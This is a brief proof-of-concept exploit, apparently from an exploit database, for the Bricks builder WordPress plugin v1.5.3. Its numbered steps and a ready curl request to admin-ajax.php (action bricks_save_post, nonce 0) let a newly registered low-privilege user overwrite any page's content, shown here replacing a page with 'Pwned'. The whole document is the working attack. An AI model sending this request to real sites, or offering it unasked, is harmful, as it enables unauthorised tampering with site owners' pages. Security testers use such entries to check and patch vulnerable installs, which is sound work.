## https://sploitus.com/exploit?id=WPEX-ID:AB4735AD-B2EC-45A3-9872-3BBAEE7E143D
1. Start with a clean Wordpress install
2. Install Bricks builder v1.5.3
3. Enable registrations on the website
4. Register as a new user, log in, and copy the cookies
5. Find a valid postId (e.g. 2 - the ID of Sample Page created by default in new Wordpress installations)
6. Send the following request to the server
curl 'http://example.com/wp-admin/admin-ajax.php' -X POST \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Cookie: INSERT_COOKIES_HERE' \
--data-raw 'action=bricks_save_post&postId=INSERT_POST_ID_HERE&area=content&nonce=0&content=%5B%7B%22id%22%3A%22aijdog%22%2C%22name%22%3A%22text%2Dbasic%22%2C%22parent%22%3A0%2C%22children%22%3A%5B%5D%2C%22settings%22%3A%7B%22text%22%3A%22Pwned%22%7D%7D%5D'
7. The contents of the page should be replaced with a paragraph reading "Pwned"